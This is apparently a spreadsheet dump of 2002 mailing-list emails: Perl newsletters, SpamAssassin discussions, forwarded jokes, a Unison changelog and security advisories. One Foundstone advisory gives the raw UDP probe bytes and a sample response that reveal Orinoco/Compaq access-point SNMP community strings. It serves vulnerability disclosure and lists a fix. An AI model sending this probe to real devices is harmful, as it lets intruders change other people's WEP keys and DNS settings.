your exploitation.This is not to say other potentially vulnerable situations have not been
found in Macromedia's Flash. We discovered about seventeen others before we
ended our testing. We are working with Macromedia on these issues.Protection:
Retina(R) Network Security Scanner already scans for this latest version of
Flash on users' systems. Ensure all users within your control upgrade their
systems.Vendor Status:
Macromedia has released a patch for this vulnerability, available at:
http://www.macromedia.com/v1/handlers/index.cfm?ID=23293&amp;Method=Full&amp;Title=M
PSB02%2D09%20%2D%20Macromedia%20Flash%20Malformed%20Header%20Vulnerability%2
0Issue&amp;Cache=FalseDiscovery: Drew Copley
Exploitation: Riley HassellGreetings: Hacktivismo!, Centra SpikeCopyright (c) 1998-2002 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail alert@eEye.com for
permission.Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.Feedback
Please send suggestions, updates, and comments to:eEye Digital Security
http://www.eEye.com
info@eEye.com
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline MailerDamian Conway to speak in London
    posted by ziggy on Thursday August 08, @15:21 (damian)
    http://use.perl.org/article.pl?sid=02/08/08/1923211Meeting in Budapest
    posted by ziggy on Thursday August 08, @17:24 (groups)
    http://use.perl.org/article.pl?sid=02/08/08/1927253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</si>
  <si>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Damian Conway to speak in London
    * Meeting in Budapest+--------------------------------------------------------------------+
| Damian Conway to speak in London                                   |
|   posted by ziggy on Thursday August 08, @15:21 (damian)           |
|   http://use.perl.org/article.pl?sid=02/08/08/1923211              |
+--------------------------------------------------------------------+[0]blech writes "Damian Conway will be coming to London in August, and
he'll be speaking at a couple of special [1]London.pm meetings, at the
approprately named [2]Conway Hall in [3]Central London.The first is [4]Life, the Universe and Everything on Tuesday 27th August,
and the second is [5]Perl 6 Prospective on Thursday 29th August. Both
start at 6.30 pm sharp, so we can fit in the maximum possible
Damian-ness.We hope to see you there!"Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/08/08/1923211Links:
    0. http://london.pm.org/
    1. http://london.pm.org/meetings/
    2. http://www.conwayhall.org.uk/
    3. http://www.streetmap.co.uk/streetmap.dll?G2M?X=530661&amp;Y=181764&amp;A=Y&amp;Z=1
    4. http://www.yetanother.org/damian/seminars/Life.html
    5. http://www.yetanother.org/damian/seminars/Perl6.html
+--------------------------------------------------------------------+
| Meeting in Budapest                                                |
|   posted by ziggy on Thursday August 08, @17:24 (groups)           |
|   http://use.perl.org/article.pl?sid=02/08/08/1927253              |
+--------------------------------------------------------------------+[0]Gabor Szabo writes "We are organizing a meeting for Perl users in
Budapest. We'll meet on 26th August at 17:00 at a location we'll announce
within a few days on [1]our mailing list. Planned agenda: How to raise
camels on the Hungarian Puszta.You can read more details (in Hungarian) [2]here. Non Hungarians who
happen to be in the area are also welcome, though the presentation(s)
will be given in Hungarian."Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/08/08/1927253Links:
    0. mailto:gabor@tracert.com
    1. http://www.atom.hu/mailman/listinfo/perl
    2. http://www.atom.hu/pipermail/perl/2002-August/001150.htmlCopyright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</si>
  <si>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Rose, Bobby wrote:
&gt;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The problem is that Python has a much longer startup time than Perl 
(though this may have changed recently, I don't know). This is partly 
why Python was never very popular for CGIs.Matt.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</si>
  <si>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Thank you for this help. I will change the score of
FROM_AND_TO_SAME rule to be higher.Benoit PeccattePS: I've noticed that the reply-to is not fixed to your mailing-list
is this normal ?On Tue, 2002-08-06 at 16:22, Theo Van Dinter wrote:
&gt; On Tue, Aug 06, 2002 at 03:29:30PM -0400, Benoit Peccatte wrote:
&gt; &gt; I would like to add a rule to spamassassin to compare 2 header lines.
&gt; &gt; By example match mails in which To: equals From:
&gt; &gt; 
&gt; &gt; I don't think it is possible with a single regular expression.
&gt; &gt; Can I use one after one other ?
&gt; &gt; Does anobody have an idea ?
&gt; 
&gt; You would have to make an Eval test that retrieves both header and
&gt; compares them.
&gt; 
&gt; BTW:
&gt; header FROM_AND_TO_SAME                eval:check_for_from_to_equivalence()
&gt; describe FROM_AND_TO_SAME      From and To the same address
&gt; 
&gt; :)
&gt; 
&gt; -- 
&gt; Randomly Generated Tagline:
&gt; It really doesn't bother me if people want to use grep or map in a void
&gt;  context.  It didn't bother me before there was a for modifier, and
&gt;  now that there is one, it still doesn't bother me.  I'm just not very
&gt;  easy to bother.
&gt;               -- Larry Wall in &lt;199911012346.PAA25557@kiev.wall.org&gt;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</si>
  <si>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pyzor.I don't know from Pyzor, but I've always thought that the way services like
Razor and DCC could be truly useful is if there were a bunch of different
ones. We can assign them scores based on how trustworthy each one is, and
when a message is listed in multiple services you can pretty much trust that
it's spam.--
Michael Moncur  mgm at starlingtech.com  http://www.starlingtech.com/
"Mustard's no good without roast beef." --Chico Marx-------------------------------------------------------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</si>
  <si>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4 Aug 2002 the voices made Scott A Crosby write:&gt; On Sun, 4 Aug 2002 16:36:57 +0200 (CEST), "Tony L. Svanstrom"
&gt;  writes:
&gt;
&gt; &gt; On Sun, 4 Aug 2002 the voices made Tony L. Svanstrom write:
&gt; &gt;
&gt; &gt;  The solution is of course to have a public key of some sort associated with
&gt; &gt; the domainame itself, at the registrar-level, so that when an e-mail arrives
&gt; &gt; the server can check if the sending-server actually is responsible for the
&gt; &gt; domain/user the e-mail appears to have been sent from.
&gt; &gt;
&gt;
&gt; That can be problematic.. For example, if I'm at home and want to send
&gt; email out from my work-address; I can't go through my ISP's
&gt; mailserver.. I don't thikn we want to enforce a link linking an email
&gt; address and the server sending it; there are many reasons to have the
&gt; two things be different entities. True, but that's the thinking of today, that the company mailserver can be
closed to you from the outside; because as it is today you can use any mail-
server that you've got access to. If there's a good reason for setting it up
they won't be that lazy in the future.&gt; However, requiring mailservers to sign the Received: header...  That
&gt; could be useful. (assuming the signature is of reasonable size). That
&gt; could indicate at what server the email *did* enter the system. IT'd
&gt; also be incontravertable proof that that mailserver did allow itself
&gt; to be abused. Signatures could be checked by either MX or inaddr-arpa
&gt; records indicating the host's public key.
&gt;
&gt; There's still some problems left though. You'd have to bind the
&gt; headers to the message somehow, via signatures. (To avoid someone
&gt; taking an email then twiddling the body and claiming that spam came
&gt; from a particular host.) This would mean that you couldn't alter the
&gt; body of a message.
&gt;
&gt; An unforgable Received chain would be very useful evidence. A simple RFC could fix that today, either using a new header or extending the
Received-header with a code/value that the server later on can verify; maybe
something like this:Received2: Date: [date];
	Local: sub.dom2.tld (IP#2);
	Remote: sub.dom3.tld (IP#3);
	Env-id: 
	Code: [cache#, salted hashvalue, rsa or other signature] And then you have the two optional From and To, only added by the sending
server that's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</si>
  <si>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&gt; The main reason I'd like to stick with a milter-based approach is the 
&gt; ability to reject messages at the SMTP stage.  This way the recipient isn't 
&gt; bothered and the sender knows immediately that the message failed.  My 
&gt; understanding is that once it gets to Procmail, as far as the sender is 
&gt; concerned, it got through.  And since all our users connect via POP, moving 
&gt; things to another folder is not an option, so the only way to notify the 
&gt; recipient is to allow the message through or replace it with a summary.I think the summary thingy, with a mail based retreive facility, is a
good alternative. You avoid false positive, only one email to list all
the spam you received in one day, and you have full per user pref.Olivier
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t>Foundstone Labs Advisory - 080902-APILAdvisory Name:	Information Leakage in Orinoco and Compaq Access Points
 Release Date:	August 9th, 2002
  Application:	Orinoco Residential Gateway and Compaq WL310
    Platforms:	N/A
     Severity:	The ability to display/modify configuration information
      Vendors:	Orinoco (http://www.orinocowireless.com) and
                  Compaq (http://www.compaq.com)
      Authors:	Marshall Beddoe (marshall.beddoe@foundstone.com)
                  Tony Bettini (tony.bettini@foundstone.com)
CVE Candidate:	CAN-2002-0812
    Reference:	http://www.foundstone.com/advisoriesOverview:An information leakage vulnerability exists in Orinoco and Compaq OEM 
access points, disclosing the unique SNMP community string. As a result,an attacker can query the community string and gain the ability to
change
system configuration including Wired Equivalent Privacy (WEP) keys and 
Domain Name Service (DNS) information.Detailed Description:The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read/write community string. The community strings appears
to be unchangable, unique, and not easily guessable. By sending a
specific packet to UDP port 192, the access point will return
information including the firmware version and the unique identification
value. The packet returned includes the value of system.sysName.0, which
in the case of the Compaq WL310 and Orinoco Residential Gateway,
includes
the unique identification value. The identification value can then be
used as the SNMP community string to view and modify the configuration.The probe packet:
"\x01\x00\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"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"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"Example probe response:
01 01 00 00 00 00 00 00  00 00 00 00 00 00 00 00  | ................
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  | ................
00 00 00 00 00 60 1d 20  2e 38 00 00 18 19 10 f8  | .....`. .8......
4f 52 69 4e 4f 43 4f 20  52 47 2d 31 31 30 30 20  | ORiNOCO RG-1100
30 33 39 32 61 30 00 00  00 00 00 00 00 00 00 00  | 0392a0..........
02 8f 24 02 52 47 2d 31  31 30 30 20 56 33 2e 38  | ..$.RG-1100 V3.8
33 20 53 4e 2d 30 32 55  54 30 38 32 33 32 33 34  | 3 SN-02UT0823234
32 20 56 00                                       | 2 V.system.sysName.0 = "ORiNOCO RG-1100 0392a0"
Community name: 0392a0Vendor Response:Both vendors were notified of this issue on July 8th, 2002. According
to Orinoco, "The Residential Gateway line has been discontinued."Solution:Employ packet filtering on inbound requests to deny access to ports
192/udp and 161/udp on the access point.FoundScan has been updated to check for this vulnerability. For more
information on FoundScan, see the Foundstone website:
http://www.foundstone.comDisclaimer:The information contained in this advisory is copyright (c) 2002 
Foundstone, Inc. and is believed to be accurate at the time of 
publishing, but no representation of any warranty is given, 
express, or implied as to its accuracy or completeness. In no 
event shall the author or Foundstone be liable for any direct, 
indirect, incidental, special, exemplary or consequential 
damages resulting from the use or misuse of this information.  
This advisory may be redistributed, provided that no fee is 
assigned and that the advisory is not modified in any way.</t>
  </si>
  <si>
    <t xml:space="preserve">On Friday, August 9, 2002, at 11:12 AM, Foundstone Labs wrote:&gt; An information leakage vulnerability exists in Orinoco and Compaq OEM
&gt; access points, disclosing the unique SNMP community string. As a result,
&gt; an attacker can query the community string and gain the ability to
&gt; change system configuration including Wired Equivalent Privacy (WEP)
&gt; keys and Domain Name Service (DNS) information.I think this is missing the point a bit...  Yes, you can query the SNMP 
community string...  And yes, it's the default PW (not to mention the 
ESSID and last 5 characters of the default WEP key...)  But they're all 
easily changed, and indeed, it is highly recommended to do so in the 
manual.Anyone who changes the default settings would not be vulnerable to this 
particular SNMP probe.  Of course, you can't account for end user 
stupidity, but that's beyond the scope of this advisory.  ;)&gt; Vendor Response:
&gt;
&gt; Both vendors were notified of this issue on July 8th, 2002. According
&gt; to Orinoco, "The Residential Gateway line has been discontinued."I've also heard (second hand, but on good authority) that the RG line is 
alive and well (hence the recent RG-1100, and the upcoming 802.11a 
version...)--Rob
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline MailerTPF Announces Newsletter Mailing List, Translations
    posted by KM on Friday August 09, @13:03 (links)
    http://use.perl.org/article.pl?sid=02/08/09/174257search.cpan.org Out of Beta
    posted by KM on Friday August 09, @16:46 (cpan)
    http://use.perl.org/article.pl?sid=02/08/09/2046256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</si>
  <si>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use Perl Daily NewsletterIn this issue:
    * TPF Announces Newsletter Mailing List, Translations
    * search.cpan.org Out of Beta+--------------------------------------------------------------------+
| TPF Announces Newsletter Mailing List, Translations                |
|   posted by KM on Friday August 09, @13:03 (links)                 |
|   http://use.perl.org/article.pl?sid=02/08/09/174257               |
+--------------------------------------------------------------------+[0]gnat writes "We've set up a mailing list for the monthly Perl
Foundation newsletters, and [1]the July newsletter went out on Thursday.
If you donated to YAS and The Perl Foundation, you are already subscribed
at the email address you provided when you donated. If you haven't
donated and want to subscribe, send an empty email message to
foundation-newsletter-subscribe@perl.org (and also consider [2]donating
:-).In other newsletter news, we have a [3]French translation of the July
newsletter on the web site. Thanks to mirod (Michel Rodriguez) for making
that happen. Translations into other languages are welcome--please
contact Kevin Meltzer (kevinm AT yetanother.org)."I *heart* your translations!Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/08/09/174257Links:
    0. mailto:gnat@frii.com
    1. http://www.perl-foundation.org/index.cgi?page=newsletter
    2. http://www.perl-foundation.org/index.cgi?page=contrib
    3. http://www.perl-foundation.org/index.cgi?page=fr/tpf-newsletter-0702
+--------------------------------------------------------------------+
| search.cpan.org Out of Beta                                        |
|   posted by KM on Friday August 09, @16:46 (cpan)                  |
|   http://use.perl.org/article.pl?sid=02/08/09/2046256              |
+--------------------------------------------------------------------+[0]gbarr writes "Since announcing the [1]search beta site a OSCON we have
recieved several feedback messages. Some have suggested changes, which we
appriciate and most will be implemented. But many of the messages were
just requesting it to become [2]search.cpan.org. So by popular demand the
switch will happen this weekend." Sweet!Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/08/09/2046256Links:
    0. mailto:gbarr-tucs@mutatus.co.uk
    1. http://search-beta.cpan.org/
    2. http://search.cpan.org/Copyright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</si>
  <si>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
Forwarded-by: Rob Windsor 
Forwarded-by: LZ A pastor walked into a neighborhood pub.  The place was hopping
with music and dancing but every once in a while the lights would
turn off.  Each time after the lights would go out the place would
erupt into cheers.However, when the revelers saw the town pastor, the room went dead
silent.  He walked up to the bartender and asked, "May I please
use the restroom?"The bartender replied, "I really don't think you should.""Why not?" the pastor asked."Well, there is a statue of a naked woman in there, and her most
private part is covered only by a fig leaf.""Nonsense," said the pastor, "I'll just look the other way."So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don't understand.  Why did they applaud for me just
because I went to the restroom?""Well, now they know you're one of us," said the bartender.  "Would
you like a drink?""But, I still don't understand," said the puzzled pastor."You see," laughed the bartender, "every time the fig leaf is lifted
on the statue, the lights go out in the whole place.  Now, how
about that drink?"
</t>
  </si>
  <si>
    <t xml:space="preserve">
Forwarded-by: Rob Windsor 
Forwarded-by: "Rich Holland" 
Forwarded-by: Diane S t . M o m ' s W o r t
Plant extract that treats mom's depression by rendering
preschoolers unconscious for up to six hours.E m p t y N e s t r o g e n
Highly effective suppository that eliminates melancholy by
enhancing the memory of how awful they were as teenagers and
how you couldn't wait till they moved out.P e p t o b i m b o
Liquid silicone for single women. Two full cups swallowed
before an evening out increases breast size, decreases
intelligence, and improves flirting.D u m e r o l
When taken with Peptobimbo, can cause dangerously low I.Q.
causing enjoyment of country western music.F l i p i t o r
Increases life expectancy of commuters by controlling road
rage and the urge to flip off other drivers.A n t i b o y o t i c s
When administered to teenage girls, is highly effective in
improving grades, freeing up phone lines, and reducing money
spent on make-up.M e n i c i l l i n
Potent antiboyotic for older women. Increases resistance to
such lines as, "You make me want to be a better person ... can
we get naked now?"B u y a g r a
Injectable stimulant taken prior to shopping. Increases
potency and duration of spending spree.E x t r a S t r e n g t h B u y-O n e-A l l
When combined with Buyagra, can cause an indiscriminate
buying frenzy so severe the victim may even come home with a
Donnie Osmond CD or a book by Dr. Laura.J a c k A s s p i r i n
Relieves the headache caused by a man who can't remember your
birthday, anniversary or phone number.A n t i - t a l k s i d e n t
A spray carried in a purse or wallet to be used on anyone too
eager to share their life stories with total strangers.R a g a m e t
When administered to a husband, provides the same irritation
as ragging on him all weekend, saving the wife the time and
trouble of doing it herself.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Forwarded-by: Nev Dull 
Forwarded-by: Adam Shand 
From: politech@politechbot.comDate: Thu, 15 Aug 2002 00:12:27 -0400
To: declan@well.com
From: Doug Isenberg 
Subject: Pop-up ads and the law
Declan:As you know, a district court judge recently entered a preliminary 
injunction against Gator in a lawsuit brought by numerous website news 
publishers over Gator's pop-up advertising service.  In my most recent 
column for The Wall Street Journal Online (now available on GigaLaw.com
at http://www.gigalaw.com/articles/2002/isenberg-2002-08.html), I
examine the potential greater effect of this lawsuit.  For example:
"Terence Ross of Gibson, Dunn &amp;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displayed."Doug Isenberg, Esq.
Author, "The GigaLaw Guide to Internet Law" (Random House, October 2002): 
http://www.GigaLaw.com/guide
FREE daily Internet law news via e-mail!  Subscribe today: 
http://www.GigaLaw.com/news-------------------------------------------------------------------------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
</t>
  </si>
  <si>
    <t xml:space="preserve">
Forwarded-by: Nev Dull 
Forwarded-by: newsletter@tvspy.com"Give me a frigging break. I've been a frigging diva for 40 frigging
years."
	-- CHER to fans in Las Vegas who booed last weekend when she
	told them the performance was part of her last tour.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Forwarded-by: Nev Dull 
Forwarded-by: "KOLE,JOHN P (HP-FtCollins,ex1)" 
From: Bell Lori [mailto:loribell01@yahoo.com]Inside me there's a thin woman screaming to get out --
But I can usually shut the bitch up with some chocolate. 
</t>
  </si>
  <si>
    <t xml:space="preserve">
[I'm sure somebody will tell me about the original source; it's in a
number of places on the web. -gkm]Forwarded-by: Colin Burgess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fashion:-The passenger reaches a certain level of drunkenness and the
"slurring gland" begins to give off a pheromone. Bacchus or one of
his many sub-contractors detects this pheromone and sends down a
winged Beer Scooter. The scooter scoops up the passenger and deposits
them in their bedroom via the Trans-Dimensional Portal. This is
not cheap to run, so a large portion of the passenger's in-pocket
cash is taken as payment.This answers the second question after a night out 'How did I spend
so much money?'Unfortunately, Beer Scooters have a poor safety record and are
thought to be responsible for over 90% of all UDI (Unidentified
Drinking Injuries).  An undocumented feature of the beer scooter
is the destruction of time segments during the trip. The nature of
Trans-Dimensional Portals dictates that time will be lost, seemingly
unaccounted for.This answers a third question after a night out 'What the hell
happened?'With good intentions, Bacchus opted for the REMIT (Removal of
Embarrassing Moments In Time) add on, that automatically removes,
in descending order, those parts in time regretted most. Unfortunately
one person's REMIT is not necessarily the REMIT of another and
quite often lost time is regained in discussions over a period of
time. Independent studies have also shown that Beer Goggles often
cause the scooter's navigation system to malfunction thus sending
the passenger to the wrong bedroom, often with horrific consequences.
With recent models including a GPS, Bacchus made an investment in
a scooter drive-thru chain specialising in half eaten kebabs and
pizza crusts.Another question answered!! For the family man, Beer Scooters come
equipped with flowers picked from other people's garden and
Thump-A-Lot boots (Patent Pending). These boots are designed in
such a way that no matter how quietly you tip-toe up the stairs,
you are sure to wake up your other half. Special anti-gravity
springs ensure that you bump into every wall in the house and the
CTSGS (Coffee Table Seeking Guidance System) explains the bruised
shins. The final add-on Bacchus saw fit to invest in for some
scooters is the TAS (Tobacco Absorption System). This explains how
one person can apparently get through 260 Marlboro Lights in a
single night.PS: Don't forget the on-board heater, which allows you to comfortably
get home from the pub in sub-zero temperatures, wearing just a
T-shirt.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Forwarded-by: Nev Dull 
Forwarded-by: "Simondo" Sean Connery was interviewed by Michael Parkinson, and bragged that
despite his 72 years of age, he could still have sex three times a
night.Lulu, who was also a guest, looked intrigued.After the show, Lulu said, "Sean, if Ah'm no bein too forward, Ah'd love
tae hae sex wi an aulder man. Let's go back tae mah place."So they go back to her place and have great sex. Afterwards, Sean  says,
"If you think that was good, let me shleep for half an hour, and we can
have even better shex. But while I'm shleeping, hold my baws in your
left hand and my wullie in your right hand."Lulu looks a bit perplexed, but says, "Okay."He sleeps for half and hour, awakens, and they have even better sex.
Then Sean says, "Lulu,  that was wonderful. But if you let me shleep
for an hour, we can have  the besht shex yet. But again, hold my baws
in your left hand, and my wullie in your right hand."Lulu is now used to the routine and  complies.The results are mind blowing. Once it's all over, and the cigarettes
are lit, Lulu asks "Sean, tell me, dis mah haudin yer baws in mah left
hand and yer wullie in mah right stimulate ye while ye're sleepin?"Sean replies, "No, but the lasht time I shlept with a Glashwegian, she
shtole my wallet."
</t>
  </si>
  <si>
    <t>use Perl Daily Headline MailerCall for Perl Monger T-Shirts at YAPC::Europe
    posted by ziggy on Monday August 19, @08:53 (yapce)
    http://use.perl.org/article.pl?sid=02/08/19/1254219This Week on perl5-porters (11-18 August 2002)
    posted by pudge on Monday August 19, @10:12 (summaries)
    http://use.perl.org/article.pl?sid=02/08/19/1230217
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</si>
  <si>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 Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/Ey.GAA/26EolB/TM
---------------------------------------------------------------------~-&gt;A new version of unison is now available for testing.  It incorporates
several small improvements over 2.9.1,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wish.The release includes pre-built executables for Linux and Solaris, but
not Windows.  (We are looking for a Unison-Windows maintainer -- at
the moment, none of the active developers are regularly using Unison
on Windows, and we do not have a machine that is configured properly
for building executables for export.)Grab it from here:
   http://www.cis.upenn.edu/~bcpierce/unison/download.htmlEnjoy,        -- Benjamin   Changes since 2.9.1:
     * Added a preference maxthreads that can be used to limit the number
       of simultaneous file transfers.
     * Added a backupdir preference, which controls where backup files
       are stored.
     * Basic support added for OSX. In particular, Unison now recognizes
       when one of the hosts being synchronized is running OSX and
       switches to a case-insensitive treatment of filenames (i.e., 'foo'
       and 'FOO' are considered to be the same file). (OSX is not yet
       fully working, however: in particular, files with resource forks
       will not be synchronized correctly.)
     *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e.g.
       synchronizing with a different host. Thanks to Ruslan Ermilov for
       this suggestion.
     * Several small user interface improvements
     * Documentation
          + FAQ and bug reporting instructions have been split out as
            separate HTML pages, accessible directly from the unison web
            page.
          + Additions to FAQ, in particular suggestions about performance
            tuning.
     * Makefile
          + Makefile.OCaml now sets UISTYLE=text or UISTYLE=gtk
            automatically, depending on whether it finds lablgtk
            installed
          + Unison should now compile ``out of the box'' under OSX
   Changes since 2.8.1:
     * Changing profile works again under Windows
     * File movement optimization: Unison now tries to use local copy
       instead of transfer for moved or copied files. It is controled by
       a boolean option ``xferbycopying''.
     * Network statistics window (transfer rate, amount of data
       transferred). [NB: not available in Windows-Cygwin version.]
     * symlinks work under the cygwin version (which is dynamically
       linked).
     * Fixed potential deadlock when synchronizing between Windows and
       Unix
     * Small improvements:
          + If neither the
            tt USERPROFILE nor the
            tt HOME environment variables are set, then Unison will put
            its temporary commit log (called
            tt DANGER.README) into the directory named by the
            tt UNISON environment variable, if any; otherwise it will use
            tt C:.
          + alternative set of values for fastcheck: yes = true; no =
            false; default = auto.
          + -silent implies -contactquietly
     * Source code:
          + Code reorganization and tidying. (Started breaking up some of
            the basic utility modules so that the non-unison-specific
            stuff can be made available for other projects.)
          + several Makefile and docs changes (for release);
          + further comments in ``update.ml'';
          + connection information is not stored in global variables
            anymore.
   Changes since 2.7.78:
     * Small bugfix to textual user interface under Unix (to avoid
       leaving the terminal in a bad state where it would not echo inputs
       after Unison exited).
   Changes since 2.7.39:
     * Improvements to the main web page (stable and beta version docs
       are now both accessible).
     * User manual revised.
     * Added some new preferences:
          + ``sshcmd'' and ``rshcmd'' for specifying paths to ssh and rsh
            programs.
          + ``contactquietly'' for suppressing the ``contacting server''
            message during Unison startup (under the graphical UI).
     * Bug fixes:
          + Fixed small bug in UI that neglected to change the displayed
            column headers if loading a new profile caused the roots to
            change.
          + Fixed a bug that would put the text UI into an infinite loop
            if it encountered a conflict when run in batch mode.
          + Added some code to try to fix the display of non-Ascii
            characters in filenames on Windows systems in the GTK UI.
            (This code is currently untested---if you're one of the
            people that had reported problems with display of non-ascii
            filenames, we'd appreciate knowing if this actually fixes
            things.)
          + `-prefer/-force newer' works properly now. (The bug was
            reported by Sebastian Urbaniak and Sean Fulton.)
     * User interface and Unison behavior:
          + Renamed `Proceed' to `Go' in the graphical UI.
          + Added exit status for the textual user interface.
          + Paths that are not synchronized because of conflicts or
            errors during update detection are now noted in the log file.
          + [END] messages in log now use a briefer format
          + Changed the text UI startup sequence so that
            tt ./unison -ui text will use the default profile instead of
            failing.
          + Made some improvements to the error messages.
          + Added some debugging messages to remote.ml.
   Changes since 2.7.7:
     * Incorporated, once again, a multi-threaded transport sub-system.
       It transfers several files at the same time, thereby making much
       more effective use of available network bandwidth. Unlike the
       earlier attempt, this time we do not rely on the native thread
       library of OCaml. Instead, we implement a light-weight,
       non-preemptive multi-thread library in OCaml directly. This
       version appears stable.
       Some adjustments to unison are made to accommodate the
       multi-threaded version. These include, in particular, changes to
       the user interface and logging, for example:
          + Two log entries for each transferring task, one for the
            beginning, one for the end.
          + Suppressed warning messages against removing temp files left
            by a previous unison run, because warning does not work
            nicely under multi-threading. The temp file names are made
            less likely to coincide with the name of a file created by
            the user. They take the form
            .#..unison.tmp.
     * Added a new command to the GTK user interface: pressing 'f' causes
       Unison to start a new update detection phase, using as paths just
       those paths that have been detected as changed and not yet marked
       as successfully completed. Use this command to quickly restart
       Unison on just the set of paths still needing attention after a
       previous run.
     * Made the ignorecase preference user-visible, and changed the
       initialization code so that it can be manually set to true, even
       if neither host is running Windows. (This may be useful, e.g.,
       when using Unison running on a Unix system with a FAT volume
       mounted.)
     * Small improvements and bug fixes:
          + Errors in preference files now generate fatal errors rather
            than warnings at startup time. (I.e., you can't go on from
            them.) Also, we fixed a bug that was preventing these
            warnings from appearing in the text UI, so some users who
            have been running (unsuspectingly) with garbage in their
            prefs files may now get error reports.
          + Error reporting for preference files now provides file name
            and line number.
          + More intelligible message in the case of identical change to
            the same files: ``Nothing to do: replicas have been changed
            only in identical ways since last sync.''
          + Files with prefix '.#' excluded when scanning for preference
            files.
          + Rsync instructions are send directly instead of first
            marshaled.
          + Won't try forever to get the fingerprint of a continuously
            changing file: unison will give up after certain number of
            retries.
          + Other bug fixes, including the one reported by Peter Selinger
            (force=older preference not working).
     * Compilation:
          + Upgraded to the new OCaml 3.04 compiler, with the LablGtk
            1.2.3 library (patched version used for compiling under
            Windows).
          + Added the option to compile unison on the Windows platform
            with Cygwin GNU C compiler. This option only supports
            building dynamically linked unison executables.
   Changes since 2.7.4:
     * Fixed a silly (but debilitating) bug in the client startup
       sequence.
   Changes since 2.7.1:
     * Added addprefsto preference, which (when set) controls which
       preference file new preferences (e.g. new ignore patterns) are
       added to.
     * Bug fix: read the initial connection header one byte at a time, so
       that we don't block if the header is shorter than expected. (This
       bug did not affect normal operation --- it just made it hard to
       tell when you were trying to use Unison incorrectly with an old
       version of the server, since it would hang instead of giving an
       error message.)
   Changes since 2.6.59:
     * Changed fastcheck from a boolean to a string preference. Its legal
       values are yes (for a fast check), no (for a safe check), or
       default (for a fast check---which also happens to be safe---when
       running on Unix and a safe check when on Windows). The default is
       default.
     * Several preferences have been renamed for consistency. All
       preference names are now spelled out in lowercase. For backward
       compatibility, the old names still work, but they are not
       mentioned in the manual any more.
     * The temp files created by the 'diff' and 'merge' commands are now
       named by prepending a new prefix to the file name, rather than
       appending a suffix. This should avoid confusing diff/merge
       programs that depend on the suffix to guess the type of the file
       contents.
     * We now set the keepalive option on the server socket, to make sure
       that the server times out if the communication link is
       unexpectedly broken.
     * Bug fixes:
          + When updating small files, Unison now closes the destination
            file.
          + File permissions are properly updated when the file is behind
            a followed link.
          + Several other small fixes.
   Changes since 2.6.38:
     * Major Windows performance improvement!
       We've added a preference fastcheck that makes Unison look only at
       a file's creation time and last-modified time to check whether it
       has changed. This should result in a huge speedup when checking
       for updates in large replicas.
       When this switch is set, Unison will use file creation times as
       'pseudo inode numbers' when scanning Windows replicas for updates,
       instead of reading the full contents of every file. This may cause
       Unison to miss propagating an update if the create time,
       modification time, and length of the file are all unchanged by the
       update (this is not easy to achieve, but it can be done). However,
       Unison will never overwrite such an update with a change from the
       other replica, since it always does a safe check for updates just
       before propagating a change. Thus, it is reasonable to use this
       switch most of the time and occasionally run Unison once with
       fastcheck set to false, if you are worried that Unison may have
       overlooked an update.
       Warning: This change is has not yet been thoroughly field-tested.
       If you set the fastcheck preference, pay careful attention to what
       Unison is doing.
     * New functionality: centralized backups and merging
          + This version incorporates two pieces of major new
            functionality, implemented by Sylvain Roy during a summer
            internship at Penn: a centralized backup facility that keeps
            a full backup of (selected files in) each replica, and a
            merging feature that allows Unison to invoke an external
            file-merging tool to resolve conflicting changes to
            individual files.
          + Centralized backups:
               o Unison now maintains full backups of the
                 last-synchronized versions of (some of) the files in
                 each replica; these function both as backups in the
                 usual sense and as the ``common version'' when invoking
                 external merge programs.
               o The backed up files are stored in a directory
                 /.unison/backup on each host. (The name of this
                 directory can be changed by setting the environment
                 variable UNISONBACKUPDIR.)
               o The predicate backup controls which files are actually
                 backed up: giving the preference 'backup = Path *'
                 causes backing up of all files.
               o Files are added to the backup directory whenever unison
                 updates its archive. This means that
                    # When unison reconstructs its archive from scratch
                      (e.g., because of an upgrade, or because the
                      archive files have been manually deleted), all
                      files will be backed up.
                    # Otherwise, each file will be backed up the first
                      time unison propagates an update for it.
               o The preference backupversions controls how many previous
                 versions of each file are kept. The default is 2 (i.e.,
                 the last synchronized version plus one backup).
               o For backward compatibility, the backups preference is
                 also still supported, but backup is now preferred.
               o It is OK to manually delete files from the backup
                 directory (or to throw away the directory itself).
                 Before unison uses any of these files for anything
                 important, it checks that its fingerprint matches the
                 one that it expects.
          + Merging:
               o Both user interfaces offer a new 'merge' command,
                 invoked by pressing 'm' (with a changed file selected).
               o The actual merging is performed by an external program.
                 The preferences merge and merge2 control how this
                 program is invoked. If a backup exists for this file
                 (see the backup preference), then the merge preference
                 is used for this purpose; otherwise merge2 is used. In
                 both cases, the value of the preference should be a
                 string representing the command that should be passed to
                 a shell to invoke the merge program. Within this string,
                 the special substrings CURRENT1, CURRENT2, NEW, and OLD
                 may appear at any point. Unison will substitute these as
                 follows before invoking the command:
                    # CURRENT1 is replaced by the name of the local copy
                      of the file;
                    # CURRENT2 is replaced by the name of a temporary
                      file, into which the contents of the remote copy of
                      the file have been transferred by Unison prior to
                      performing the merge;
